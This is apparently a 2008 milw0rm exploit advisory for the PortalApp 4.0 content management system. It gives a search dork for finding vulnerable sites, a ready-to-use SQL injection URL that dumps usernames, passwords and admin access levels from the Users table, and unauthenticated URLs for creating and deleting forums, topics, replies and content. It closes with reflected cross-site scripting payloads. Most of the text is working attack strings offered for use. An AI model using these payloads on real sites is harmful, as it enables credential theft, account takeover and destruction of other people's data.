############################################################################## #Title: PortalApp 4.0 Multiple vulnerabilities # # # #Discovered By: r3dm0v3 # # http://r3dm0v3.persianblog.ir # # r3dm0v3( 4t }yahoo[dot}com # # Tehran - Iran # # # #Vendor: http://www.portalapp.com # #Vulnerable Version: 4.0, prior versions maybe vulnerable # #Remote Exploit: Yes # #Dork: "Copyright @2007 Iatek LLC" # #Fix: Not Available # ############################################################################## ############################################################################## # SQL Injection (CRITICAL) # ############################################################################## #Description: PortalApp is a Content Management System (CMS) for websites. Bug: The user input 'sortby' is directly used in query statement! #Exploit: http://site.com/forums.asp?keywords=r3dm0v3&do_search=1&sortby=users.user_name+UNION+SELECT+1,2,3,4,5,password,user_name,8,9,10,user_id,accesslevel,13,14,15+FROM+Users author will be usernames topic will be passwords replies will be username IDs views will be access levels (5 is super admin) ############################################################################## # Following actions in 'forum.asp' can take done without any authentication. # ############################################################################## create a forum:
userid:by default 255 is sa
ForumName:
Description:
ForumSection:
DisplayOrder:
create a topic:
userid:by default 255 is sa
ForumID:
Subject:
Message:

Icon:
Show Signature:
Notify:
Locked:
Sticky:
Date:
DateLast:
delete a forum: http://site.com/forums.asp?action=delete_level1_edit_disc_forums&ForumId=[ForumID] delete a topic: http://site.com/forums.asp?action=delete_level2_edit_disc_topics&TopicId=[TopicID] delete a reply: http://site.com/forums.asp?action=delete_level3_edit_disc_replies&ReplyId=[ReplyID] delete a topic reply: http://site.com/forums.asp?action=delete_level2_disc_replies&TopicId=[TopicID]&ReplyId=[ReplyID] #There some other actions: insert_level3_edit_disc_replies insert_detail_disc_topics update_level1_edit_disc_forums update_level2_edit_disc_topics update_level3_edit_disc_replies update_detail_disc_topics update_level2_disc_replies ############################################################################## #Following actions in 'Content.asp' can take done without any authentication.# ############################################################################## Add content:
userid:by default 255 is sa
ContentTypeID:1:general(company) 2:article 3:lin 4:news 5:announcement 6:download 7:gallery 8:faq ...
catID:
Date:
Author:
title:
ShortDesc:

LongDesc:

relatedULR
DownloadURL:
Filename:
Thumbnail:
Image1:
PrevContentID:
NextContentID:
views:
AVGRating:
'insert_detail_content' is also vulnerable. Use above html code for exploit ############################################################################## # XSS # ############################################################################## http://site.com/forums.asp?keywords=%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&do_search=1 http://site.com/content.asp?ContentType=General&keywords=%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&do_search=1 # milw0rm.com [2008-01-06]